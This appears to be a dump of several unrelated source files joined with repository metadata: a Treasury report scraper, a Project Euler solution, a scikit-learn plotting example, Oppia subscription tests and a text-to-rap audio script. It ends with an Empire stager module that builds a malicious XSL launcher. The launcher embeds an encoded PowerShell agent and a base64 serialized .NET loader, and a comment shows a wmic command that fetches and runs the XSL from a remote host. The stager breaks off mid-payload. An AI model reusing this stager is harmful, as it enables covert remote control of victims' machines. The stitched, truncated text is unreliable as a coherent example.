report_url = "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG11071.pdf"
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': agency_slug,
'agency_name': AGENCY_NAMES[agency_slug],
'type': 'audit',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if unreleased:
report['unreleased'] = unreleased
if landing_url:
report['landing_url'] = landing_url
return report
def report_from(result, page_url, report_type, year_range):
try:
title, date1, date2 = result.text.rsplit(",", 2)
published_on_text = date1 + date2
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d %Y')
except ValueError:
try:
title, date1, date2, date3 = result.text.rsplit(maxsplit=3)
published_on_text = date1 + date2 + date3
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B%d,%Y')
except ValueError:
title = result.text
published_on = None
title = clean_text(title)
original_title = title
report_id, title = title.split(maxsplit=1)
report_id = report_id.rstrip(":")
if result.name == "a":
link = result
else:
link = result.a
report_url = urljoin(page_url, link['href'])
# HTTPS, even if they haven't updated their links yet
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
if report_id.find('-') == -1:
# If the first word of the text doesn't contain a hyphen,
# then it's probably part of the title, and not a tracking number.
# In this case, fall back to the URL.
report_filename = report_url.split("/")[-1]
report_id, extension = os.path.splitext(report_filename)
report_id = unquote(report_id)
# Reset the title, since we previously stripped off the first word
# as a candidate report_id.
title = original_title
if report_id in REPORT_PUBLISHED_MAP:
published_on = REPORT_PUBLISHED_MAP[report_id]
if not published_on:
admin.log_no_date("treasury", report_id, title, report_url)
return
# Skip this report, it already shows up under other audit reports
if report_id == "Role of Non-Career Officials in Treasury FOIA Processing":
return
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': 'treasury',
'agency_name': "Department of the Treasury",
'type': report_type,
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
return report
def semiannual_report_from(result, page_url, year_range):
published_on_text = clean_text(result.text)
published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d, %Y')
title = "Semiannual Report - {}".format(published_on_text)
report_url = urljoin(page_url, result['href'])
# HTTPS, even if they haven't updated their links yet
report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url)
report_filename = report_url.split("/")[-1]
report_id, extension = os.path.splitext(report_filename)
report_id = unquote(report_id)
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'treasury',
'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/',
'agency': 'treasury',
'agency_name': "Department of the Treasury",
'type': 'semiannual_report',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | 3,522,391,499,883,024,000 | 37.255051 | 204 | 0.676678 | false |
Igglyboo/Project-Euler | 1-99/30-39/Problem35.py | 1 | 1086 | from time import clock
def timer(function):
def wrapper(*args, **kwargs):
start = clock()
print(function(*args, **kwargs))
print("Solution took: %f seconds." % (clock() - start))
return wrapper
@timer
def find_answer():
total = 0
primes = sieve(1000000)
primes.remove(0)
for prime in primes:
p_str = list(str(prime))
p_str.append(p_str.pop(0))
for i in range(len(p_str) - 1):
current = int(''.join(x for x in p_str))
if current not in primes:
break
p_str.append(p_str.pop(0))
else:
total += 1
return total
def sieve(upperlimit):
l = list(range(2, upperlimit + 1))
# Do p = 2 first so we can change step size to 2*p below
for i in range(4, upperlimit + 1, 2):
l[i - 2] = 0
for p in l:
if p ** 2 > upperlimit:
break
elif p:
for i in range(p * p, upperlimit + 1, 2 * p):
l[i - 2] = 0
return set(l)
if __name__ == "__main__":
find_answer()
| unlicense | 2,629,917,463,131,232,000 | 20.294118 | 63 | 0.503683 | false |
karstenw/nodebox-pyobjc | examples/Extended Application/sklearn/examples/ensemble/plot_ensemble_oob.py | 1 | 4073 | """
=============================
OOB Errors for Random Forests
=============================
The ``RandomForestClassifier`` is trained using *bootstrap aggregation*, where
each new tree is fit from a bootstrap sample of the training observations
:math:`z_i = (x_i, y_i)`. The *out-of-bag* (OOB) error is the average error for
each :math:`z_i` calculated using predictions from the trees that do not
contain :math:`z_i` in their respective bootstrap sample. This allows the
``RandomForestClassifier`` to be fit and validated whilst being trained [1].
The example below demonstrates how the OOB error can be measured at the
addition of each new tree during training. The resulting plot allows a
practitioner to approximate a suitable value of ``n_estimators`` at which the
error stabilizes.
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", p592-593, Springer, 2009.
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
# Author: Kian Ho <[email protected]>
# Gilles Louppe <[email protected]>
# Andreas Mueller <[email protected]>
#
# License: BSD 3 Clause
# nodebox section
if __name__ == '__builtin__':
# were in nodebox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
print(__doc__)
RANDOM_STATE = 123
# Generate a binary classification dataset.
X, y = make_classification(n_samples=500, n_features=25,
n_clusters_per_class=1, n_informative=15,
random_state=RANDOM_STATE)
# NOTE: Setting the `warm_start` construction parameter to `True` disables
# support for parallelized ensembles but is necessary for tracking the OOB
# error trajectory during training.
ensemble_clfs = [
("RandomForestClassifier, max_features='sqrt'",
RandomForestClassifier(warm_start=True, oob_score=True,
max_features="sqrt",
random_state=RANDOM_STATE)),
("RandomForestClassifier, max_features='log2'",
RandomForestClassifier(warm_start=True, max_features='log2',
oob_score=True,
random_state=RANDOM_STATE)),
("RandomForestClassifier, max_features=None",
RandomForestClassifier(warm_start=True, max_features=None,
oob_score=True,
random_state=RANDOM_STATE))
]
# Map a classifier name to a list of (<n_estimators>, <error rate>) pairs.
error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)
# Range of `n_estimators` values to explore.
min_estimators = 15
max_estimators = 175
for label, clf in ensemble_clfs:
for i in range(min_estimators, max_estimators + 1):
clf.set_params(n_estimators=i)
clf.fit(X, y)
# Record the OOB error for each `n_estimators=i` setting.
oob_error = 1 - clf.oob_score_
error_rate[label].append((i, oob_error))
# Generate the "OOB error rate" vs. "n_estimators" plot.
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_estimators, max_estimators)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
# plt.show()
pltshow(plt)
| mit | 7,607,601,848,409,383,000 | 32.385246 | 82 | 0.64056 | false |
souravbadami/oppia | core/controllers/subscriptions_test.py | 1 | 5437 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for user subscriptions."""
from core.domain import subscription_services
from core.platform import models
from core.tests import test_utils
import feconf
(user_models,) = models.Registry.import_models([models.NAMES.user])
class SubscriptionTests(test_utils.GenericTestBase):
USER_EMAIL = '[email protected]'
USER_USERNAME = 'user'
USER2_EMAIL = '[email protected]'
USER2_USERNAME = 'user2'
def setUp(self):
super(SubscriptionTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.USER_EMAIL, self.USER_USERNAME)
self.user_id = self.get_user_id_from_email(self.USER_EMAIL)
self.signup(self.USER2_EMAIL, self.USER2_USERNAME)
self.user_id_2 = self.get_user_id_from_email(self.USER2_EMAIL)
def test_subscribe_handler(self):
"""Test handler for new subscriptions to creators."""
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'creator_username': self.EDITOR_USERNAME
}
# Test that the subscriber ID is added to the list of subscribers
# of the creator and the creator ID is added to the list of
# subscriptions of the user.
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [self.editor_id])
# Subscribing again, has no effect.
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [self.editor_id])
self.logout()
# Test another user subscription.
self.login(self.USER2_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id, self.user_id_2])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [self.editor_id])
self.logout()
def test_unsubscribe_handler(self):
"""Test handler for unsubscriptions."""
payload = {
'creator_username': self.EDITOR_USERNAME
}
# Add one subscription to editor.
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.logout()
# Add another subscription.
self.login(self.USER2_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
# Test that on unsubscription, the learner ID is removed from the
# list of subscriber IDs of the creator and the creator ID is
# removed from the list of subscriptions of the learner.
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [])
# Unsubscribing the same user has no effect.
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [self.user_id])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id_2), [])
self.logout()
# Unsubscribing another user.
self.login(self.USER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.UNSUBSCRIBE_URL_PREFIX, payload,
csrf_token=csrf_token)
self.assertEqual(subscription_services.get_all_subscribers_of_creator(
self.editor_id), [])
self.assertEqual(
subscription_services.get_all_creators_subscribed_to(
self.user_id), [])
| apache-2.0 | -6,100,545,665,668,864,000 | 35.986395 | 78 | 0.63638 | false |
ruofengchen/mc-hawking | rap_gen.py | 1 | 6438 | import subprocess
from numpy import *
from scipy import *
import wave
import scipy.io.wavfile
import scipy.signal
import random
import pylab
import pdb
'''By Ruofeng Chen, April 2013'''
voices = ["Albert", "Bad News", "Bahh", "Bells", "Boing", "Bubbles", "Cellos", "Deranged", "Good News", "Hysterical", "Pipe Organ", "Trinoids", "Whisper", "Zarvox"]
pulses = {}
pulses[1] = [0]
pulses[2] = [0, 4]
pulses[3] = [0, 4, 8]
pulses[4] = [12, 16, 20, 24]
pulses[5] = [8, 12, 16, 20, 24]
pulses[6] = [6, 8, 12, 16, 20, 24]
pulses[7] = [6, 8, 10, 12, 22, 24, 28]
pulses[8] = [6, 8, 10, 12, 22, 24, 26, 28]
pulses[9] = [6, 8, 10, 12, 16, 20, 24, 26, 28]
pulses[10] = [4, 6, 8, 10, 12, 16, 20, 24, 26, 28]
pulses[11] = [4, 6, 8, 10, 12, 16, 18, 20, 24, 26, 28]
pulses[12] = [4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[13] = [2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[14] = [0, 2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28]
pulses[15] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28]
pulses[16] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30]
# ratios = [1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1]
synth_path = "./synth"
rap_path = "./rap"
def time_stretch_half(dafxin):
''''''
hopsize = 480 # sounds good using this parameter
framesize = 2 * hopsize
hannWin = hanning(framesize)
framenum = dafxin.size / hopsize - 1
dafxout = zeros(hopsize*(framenum/2)+framesize)
for n in range(framenum):
if n % 2 == 0:
dafxout[n/2*hopsize:n/2*hopsize+framesize] = dafxout[n/2*hopsize:n/2*hopsize+framesize] + dafxin[n*hopsize:n*hopsize+framesize] * hannWin
return dafxout
def synth(words, voice="Fred"):
for word in words:
fullcmd = ['say', '-v', voice, '-o', synth_path+'/'+str(hash(word))+'.wav', '--data-format=LEI16@44100', word]
subprocess.check_output(fullcmd)
def align_to_beats(everything):
''' YO YO '''
tempo = 140
intvl = 0.25 / (tempo / 60.) * 44100.
total_len = 8 / (tempo / 60.) * 44100.
data_list = []
for tup in everything:
for i in range(len(tup[1])):
data_list.append(tup[0][tup[1][i]:tup[2][i]])
fs, rapdata = scipy.io.wavfile.read(open('drum_1bar.wav', 'r'))
rapdata = float32(rapdata / float(2**16))
rapdata = mean(rapdata, 1)
rapdata = rapdata * 0.2
# rapdata = zeros(total_len * 1.5) # if you don't want accompaniment
total_voice_len = sum([data.size for data in data_list])
syllable_num = len(data_list)
if syllable_num > 16:
syllable_num = 16
# this will result in overlapping words
pulse = pulses[syllable_num]
for s in range(syllable_num):
start = pulse[s] * intvl
if s < syllable_num - 1 and data_list[s].size > 1.5 * (pulse[s+1] - pulse[s]) * intvl:
data_list[s] = time_stretch_half(data_list[s])
if s == 0:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 2.
elif pulse[s] % 4 == 0:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 1.2
else:
rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s]
# pylab.plot(rapdata)
# pylab.show()
# delete the tailing zeros
first_zero = rapdata.size-1
while rapdata[first_zero] == 0:
first_zero = first_zero - 1
rapdata = rapdata[0:first_zero]
# delete the heading few samples
rapdata = rapdata[0.2*44100:-1]
rapdata = rapdata / max(abs(rapdata)) * 0.4
rapdata = array(rapdata * float(2**16), dtype=int16)
return rapdata
def find_onsets_and_offsets(data):
th = 0
hopsize = 512
framenum = data.size / hopsize
# find all onsets
energy0 = 0
onsets = []
offsets = []
for n in range(framenum):
energy1 = sum(data[n*hopsize:(n+1)*hopsize] ** 2) / hopsize
if energy0 <= th and energy1 > th:
ind = n*hopsize
onsets.append(ind)
# from this onset on, find its corresponding offset
n2 = n
energy2 = energy1
while (n2+1)*hopsize <= data.size and energy2 > th:
energy2 = sum(data[n2*hopsize:(n2+1)*hopsize] ** 2) / hopsize
n2 = n2 + 1
if (n2+1)*hopsize > data.size:
offsets.append(data.size-1)
else:
offsets.append(n2*hopsize)
energy0 = energy1
if len(onsets) != len(offsets):
print "Big problem!!! Onsets != Offsets"
# for all words that are too short, merge them with the shorter neighbor
if len(onsets) > 1:
while True:
short_count = 0
for i in range(len(onsets)):
if offsets[i] - onsets[i] < 44100 * 0.2:
short_count = short_count + 1
if short_count == 0:
break
for i in range(len(onsets)):
if offsets[i] - onsets[i] < 44100 * 0.2:
if i >= 1 and i <= len(onsets)-2:
if offsets[i-1] - onsets[i-1] < offsets[i+1] - onsets[i+1]:
onsets.pop(i)
offsets.pop(i-1)
else:
onsets.pop(i+1)
offsets.pop(i)
elif i == 0:
onsets.pop(i+1)
offsets.pop(i)
else:
onsets.pop(i)
offsets.pop(i-1)
break
return array(onsets, int), array(offsets, int)
def from_text_to_wavfile(sentence):
words = sentence.split(" ")
synth(words)
everything = []
for word in words:
fs, data = scipy.io.wavfile.read(open(synth_path+'/'+str(hash(word))+'.wav', 'r'))
data = float32(data / float(2**16))
if fs != 44100:
print "warning: fs is not 44100!!!!!!"
onsets, offsets = find_onsets_and_offsets(data)
everything.append((data, onsets, offsets))
rapdata = align_to_beats(everything)
scipy.io.wavfile.write(rap_path+'/'+str(hash(sentence))+'-rap.wav', 44100, rapdata)
if __name__ == '__main__':
# generate the audio
sentence = '''thank you so much for coming tonight'''
from_text_to_wavfile(sentence)
| gpl-2.0 | 5,563,728,229,412,827,000 | 34.373626 | 164 | 0.540385 | false |
Hackplayers/Empire-mod-Hackplayers | lib/stagers/windows/starfighters_xsl.py | 1 | 61839 | from lib.common import helpers
from termcolor import colored
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'XSL Launcher StarFighter',
'Author': ['@CyberVaca'],
'Description': ('Generates a .xsl launcher for Empire.'),
'Comments': [
'wmic process get brief /format:"http://10.10.10.10/launcher.xsl"'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'OutFile': {
'Description': 'File to output XSL to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.xsl'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
launcher = launcher.replace("powershell -noP -sta -w 1 -enc ","")
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = """<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
"""
code +="var EncodedPayload = \"" + launcher + "\"\n"
code += """
/*
Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.
*/
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA"+
"AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA"+
"AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg"+
"AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB"+
"AAARKBEAAAoDKBIAAApvEwAACgp+AQAABAZvCwAABhcqHgIoFAAACioucwQAAAaAAQAABCoAABsw"+
"AwDmAAAAAgAAEQJzFAAACn0HAAAEAigUAAAKKBUAAAoKBnIBAABwcxYAAApvFwAACgICcw0AAAZ9"+
"BAAABAICewQAAAQGKBgAAAp9BQAABAJ7BQAABG8ZAAAKAnsHAAAECwcoGgAACgIoGwAACn0GAAAE"+
"3gcHKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKcg0AAHAoOAAABgwWDSsiCAmaEwQCewYAAAQRBG8e"+
"AAAKAnsGAAAEbx8AAAomCRdYDQkIjmky2N4pAnsHAAAECwcoGgAACgJ7BgAABG8gAAAKAhR9BgAA"+
"BN4HBygcAAAK3NwqAAABKAAAAgBdAA1qAAcAAAAAAgDJABTdAAcAAAAAAgByAEq8ACkAAAAAHgJ7"+
"AgAABCoiAgN9AgAABCoeAnsDAAAEKiICA30DAAAEKgAAGzAFAMoAAAADAAARAyghAAAKLAEqAnsH"+
"AAAECgYoGgAACgIoGwAACn0GAAAE3gcGKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEA28i"+
"AAAKJgJ7BgAABHIjAABwbyMAAAomAnsGAAAEbyQAAApvJQAAChZvJgAAChgXbycAAAoELBgCewYA"+
"AAQXjRAAAAElFgSibygAAAom3jcCewYAAARvHwAACibeKQJ7BwAABAoGKBoAAAoCewYAAARvIAAA"+
"CgIUfQYAAATeBwYoHAAACtzcKgAAASgAAAIAFgANIwAHAAAAAAIArQAUwQAHAAAAAAIAKwB1oAAp"+
"AAAAABswBQAKAQAABAAAEQM5AwEAAAN1FgAAAQsHLAkHbykAAAoKKw4DcjsAAHAWFHMqAAAKCgJ7"+
"BwAABAwIKBoAAAoCKBsAAAp9BgAABN4HCCgcAAAK3AJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEcmUA"+
"AHBvIgAACnJzAABwbyMAAAomcysAAAoTBBEEBm8sAAAKEQRvLQAACgJ7BgAABBEEbygAAAoNCW8u"+
"AAAKFjE9CRZvLwAACm8wAAAKdUMAAAETBREFKCEAAAotIQJ7BAAABG8xAAAKEQUWEQVvMgAAChhZ"+
"bzMAAApvNAAACt4pAnsHAAAEDAgoGgAACgJ7BgAABG8gAAAKAhR9BgAABN4HCCgcAAAK3NwqAAAB"+
"KAAAAgA0AA1BAAcAAAAAAgDtABQBAQcAAAAAAgBZAIfgACkAAAAAGzADABUAAAAFAAARAgMUKAkA"+
"AAbeCgoCBigKAAAG3gAqAAAAARAAAAAAAAAKCgAKGgAAARswAgBfAAAABgAAEQJ7BwAABAoGKBoA"+
"AAoCewYAAAQsHgJ7BgAABG81AAAKbzYAAAoXMwsCewYAAARvNwAACt4HBigcAAAK3AQXbzgAAAre"+
"GQsCewQAAARvMQAACgdvOQAACm80AAAK3gAqAAEcAAACAA0AKDUABwAAAAAAAAAARUUAGRUAAAHm"+
"Aig6AAAKbzsAAAp9CwAABAIoOgAACm88AAAKfQwAAAQCczYAAAZ9DQAABAIoPQAACgIDfQoAAAQq"+
"HgJ7CwAABCoeAnsMAAAEKhp+CQAABCoacokAAHAqHgJ7DQAABCoqFxYWFnM+AAAKKioCewgAAAQU"+
"/gMqMgJ7CgAABHsFAAAEKjYCewoAAAQDfQUAAAQqLnKXAABwcz8AAAp6LnI+AQBwcz8AAAp6Bipm"+
"AnsKAAAEF28GAAAGAnsKAAAEA28IAAAGKlICAnsIAAAEKBYAAAYCFH0IAAAEKlICAigVAAAGfQgA"+
